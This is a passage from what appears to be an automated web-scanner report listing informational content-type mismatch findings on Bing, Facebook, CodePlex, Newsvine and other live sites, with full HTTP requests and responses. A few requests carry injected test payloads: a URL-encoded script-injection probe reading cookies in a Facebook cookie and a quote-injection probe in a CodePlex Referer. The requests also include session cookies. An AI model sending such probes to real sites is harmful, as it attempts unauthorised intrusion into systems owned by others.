Set-Cookie: _SS=SID=C16866E6F1A44DF887970AC15A109589; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:03 GMT; domain=.bing.com; path=/

Ref A: 2543A6AD547E4B5F88CAF1F4B990F00A Ref B: 3A793CF2861BA22FABD77094EB0904DE Ref C: Sat Jan 29 15:53:03 2011
PST

34.93. http://www.bing.com/travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751

Issue detail

The response contains the following Content-type statement:

    Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:03 GMT
Connection: close
Set-Cookie: _SS=SID=DF4AEC402932490192415C046FCE0D03; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:03 GMT; domain=.bing.com; path=/

Ref A: 22A32A2A68354A09B360D2992262AABF Ref B: 33A52F487F682CE81DF860C8B90E62C4 Ref C: Sat Jan 29 15:53:03 2011
PST

34.94. http://www.bing.com/videos/services/user/info

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /videos/services/user/info

Issue detail

The response contains the following Content-type statement:

    Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /videos/services/user/info?callback=jsonp1296407516784&responseEncoding=json HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/videos/browse
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: text/javascript, application/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VIDSCHUSR=CLICKMODE=0&VMUTE=0&PARTNER=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _SS=SID=4318D78D50E640FC90E674B1FECFA468&hIm=178; RMS=F=O; MUID=DC63BAA44C3843F38378B4BB213E0A6F; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; SRCHD=SM=1&MS=1621031&D=1593447&AF=NOFORM; _FP=BDCE=129409675061634862&BDCEH=4B00CE098126B4CE6DFFB8D547F7B893; _UR=OMW=0; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 165
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 17:11:59 GMT
Connection: close

jsonp1296407516784({"user":{"country":{"name":{"$":'us'},"flags":{"$":'40000000'},"$":null},"market":{"name":{"$":'en-us'},"enabled":{"$":'True'},"$":null},"$":""}})

34.95. http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo

Issue detail

The response contains the following Content-type statement:

    Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:52:48 GMT
Connection: close
Set-Cookie: _SS=SID=96515E70C1394D22AE9809D980A4559B; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:48 GMT; domain=.bing.com; path=/

Ref A: 064950FD5BA64B248B41CFFBAE5C4771 Ref B: AFAF33903714AC5B6D764143C29EA2A4 Ref C: Sat Jan 29 15:52:48 2011
PST

34.96. http://www.bing.com/videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo

Issue detail

The response contains the following Content-type statement:

    Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:52:43 GMT
Connection: close
Set-Cookie: _SS=SID=24874BCFBCB44B8B85CBC2902237BB66; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:43 GMT; domain=.bing.com; path=/

Ref A: AAD1B8D4086344DAA11FB6781C52DF5D Ref B: F6A08B0C3BC2B3B37340133B5CB10F06 Ref C: Sat Jan 29 15:52:43 2011
PST

34.97. http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs

Issue detail

The response contains the following Content-type statement:

    Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:52:48 GMT
Connection: close
Set-Cookie: _SS=SID=C1449677CB9D4A6CA3BAE7B9A7C13450; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:48 GMT; domain=.bing.com; path=/

Ref A: 014881C8B97D404988E2C53F6F54BE0B Ref B: B8DDD36B11B4F2ABEB77E7FA5CC7288A Ref C: Sat Jan 29 15:52:48 2011
PST

34.98. http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck

Issue detail

The response contains the following Content-type statement:

    Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:52:44 GMT
Connection: close
Set-Cookie: _SS=SID=F5CECEC5DAB34C3DB68586F5B7502AC3; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:44 GMT; domain=.bing.com; path=/

Ref A: AAB024B4D5FE4F2798F83EB8EAC8D0C7 Ref B: 4B8191579F9751ED83CBE2C2B9D111CC Ref C: Sat Jan 29 15:52:44 2011
PST

34.99. http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv

Issue detail

The response contains the following Content-type statement:

    Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:52:51 GMT
Connection: close
Set-Cookie: _SS=SID=042186D5ACA443269CD8645BC53318FB; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:50 GMT; domain=.bing.com; path=/

Ref A: A79783D4834F4DFE80D0EC922059FE12 Ref B: 9DBF36B561C1B7930109FA7DE5C95BEC Ref C: Sat Jan 29 15:52:50 2011
PST

34.100. http://www.co2stats.com/propres.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.co2stats.com
Path:   /propres.php

Issue detail

The response contains the following Content-type statement:

    Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /propres.php?s=1138 HTTP/1.1
Host: www.co2stats.com
Proxy-Connection: keep-alive
Referer: http://news.ycombinator.com/news
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:47:32 GMT
Server: Apache/2.2.17
Content-Length: 2967
Content-Type: text/html

var co2stats_width = 0, co2stats_height = 0;
if( typeof( window.innerWidth ) == 'number' ) {
//Non-IE
co2stats_width = window.innerWidth;
co2stats_height = window.innerHeight;
} else if( documen
...[SNIP]...

34.101. http://www.codeplex.com/site/analyticsid.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.codeplex.com
Path:   /site/analyticsid.aspx

Issue detail

The response contains the following Content-type statement:

    Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /site/analyticsid.aspx HTTP/1.1
Host: www.codeplex.com
Proxy-Connection: keep-alive
Referer: http://silverlight.codeplex.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=aa53c1dyzeonloxydyax0t0n

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 12:49:41 GMT
Content-Length: 69


<!--
gAnalyticsId="c7d82760-7eb0-4584-8ba0-343413b027c8";
// -->

34.102. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The response contains the following Content-type statement:

    Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /extern/login_status.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 01:22:22 GMT
Content-Length: 22

Invalid Application ID

34.103. http://www.hoovers.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.hoovers.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

    Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.hoovers.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HID=10.1.1.227.122391296352471936; BIGipServerholpriv-colo1=1342243082.20480.0000; BIGipServerwww-1=1341968906.20480.0000; s_cc=true; s_nr=1296352492087; s_ats=undefinedburpburpReferrersReferrers; ctc2=1; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A26274851D2CD5-60000130C044F459[CE]

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:54:56 GMT
Server: Apache
Last-Modified: Fri, 09 Oct 2009 00:43:07 GMT
ETag: "e36"
Accept-Ranges: bytes
Content-Length: 3638
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerhaspriv-colo1=251384330.20480.0000; path=/
P3P: CP="NON DSP COR ADM DEV CONo TELo DELo SAMo OTRo UNRo LEG PRE"

..............h...&... ..............(....... ...........@...........................Y*................................................................................................................
...[SNIP]...

34.104. http://www.kanoodle.com/ajax/search_spy_data.html

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.kanoodle.com
Path:   /ajax/search_spy_data.html

Issue detail

The response contains the following Content-type statement:

    Content-Type: text/html; charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ajax/search_spy_data.html HTTP/1.1
Host: www.kanoodle.com
Proxy-Connection: keep-alive
Referer: http://www.kanoodle.com/js/ochart/open-flash-chart.swf?width=500&height=300&data=/ajax/search_spy_data.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:53:32 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650; domain=.kanoodle.com; path=/; expires=Sun, 13-Feb-2011 14:53:32 GMT
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 529

&title=Top+Searches+-+Recent,{font-size: 16px; color: #003399}&
&x_legend=Term,14,#003399&
&x_label_style=9,#003399,2&
&x_axis_steps=1&
&y_legend=Percent,14,#003399&
&y_ticks=5,10,3&
&bar=100,#0
...[SNIP]...

34.105. http://www.kanoodle.com/ajax/search_spy_data_today.html

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.kanoodle.com
Path:   /ajax/search_spy_data_today.html

Issue detail

The response contains the following Content-type statement:

    Content-Type: text/html; charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ajax/search_spy_data_today.html HTTP/1.1
Host: www.kanoodle.com
Proxy-Connection: keep-alive
Referer: http://www.kanoodle.com/js/ochart/open-flash-chart.swf?width=500&height=300&data=/ajax/search_spy_data_today.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:53:32 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650; domain=.kanoodle.com; path=/; expires=Sun, 13-Feb-2011 14:53:32 GMT
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 765

&title=Top+Searches+-+History,{font-size: 16px; color: #003399}&
&x_legend=Term,14,#003399&
&x_label_style=9,#003399,2&
&x_axis_steps=1&
&y_legend=Percent,14,#003399&
&y_ticks=5,10,3&
&bar=100,#
...[SNIP]...

34.106. http://www.kanoodle.com/images/kanoodle-lightbulb-home.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.kanoodle.com
Path:   /images/kanoodle-lightbulb-home.gif

Issue detail

The response contains the following Content-type statement:

    Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /images/kanoodle-lightbulb-home.gif HTTP/1.1
Host: www.kanoodle.com
Proxy-Connection: keep-alive
Referer: http://www.kanoodle.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:53:25 GMT
Server: Apache
Last-Modified: Wed, 26 Jan 2011 21:55:06 GMT
ETag: "16838b-16ad-e2cb0280"
Accept-Ranges: bytes
Content-Length: 5805
Connection: close
Content-Type: image/gif

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................a....
...[SNIP]...

34.107. http://www.newsvine.com/_action/article/emailThis

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.newsvine.com
Path:   /_action/article/emailThis

Issue detail

The response contains the following Content-type statement:

    Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /_action/article/emailThis HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:22:40 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=303dface27cc204606d11d8c52727498; expires=Sat, 25-Jan-2031 01:22:40 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Length: 2
Content-Type: text/html; charset=UTF-8
Connection: close

[]

34.108. http://www.newsvine.com/_action/user/startTracking

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.newsvine.com
Path:   /_action/user/startTracking

Issue detail

The response contains the following Content-type statement:

    Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /_action/user/startTracking HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:22:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=fd03e0f2b9d7ca49ce9718040d6e1a3e; expires=Sat, 25-Jan-2031 01:22:46 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Length: 1
Content-Type: text/html; charset=UTF-8
Connection: close

1

34.109. http://www.newsvine.com/_action/user/stopTracking

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.newsvine.com
Path:   /_action/user/stopTracking

Issue detail

The response contains the following Content-type statement:

    Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /_action/user/stopTracking HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:22:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=da0aaca01f1bdb2b9d0331ebe22cd506; expires=Sat, 25-Jan-2031 01:22:41 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Length: 1
Content-Type: text/html; charset=UTF-8
Connection: close

1

34.110. http://www.newsvine.com/_vine/m2

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.newsvine.com
Path:   /_vine/m2

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

POST /_vine/m2 HTTP/1.1
Host: www.newsvine.com
Proxy-Connection: keep-alive
Referer: http://www.newsvine.com/
Origin: http://www.newsvine.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; vid=55d515b4f7dadf9aee6395750020b187; TZM=-360; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296399959031
Content-Length: 104

call=streamData&moduleId=27&usedContent=5935834,5953356,5953653,5953656,5953706,5953816,5953817,5953818,

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 15:03:59 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: Keep-Alive
Content-Length: 14168

[{"url":"\/_action\/article\/mediaArticle?mediaContentId=5951930","src":"http:\/\/www.polls.newsvine.com\/_vine\/images\/ap\/nws\/4cc5b54e-813b-4b64-a004-91823baaa2a9.jpg","width":"380","height":"280"
...[SNIP]...

34.111. http://www.newsvine.com/_vine/printer

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.newsvine.com
Path:   /_vine/printer

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /_vine/printer?call=streamSessionObjects&sectionDomain=www&path=/ HTTP/1.1
Host: www.newsvine.com
Proxy-Connection: keep-alive
Referer: http://www.newsvine.com/
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
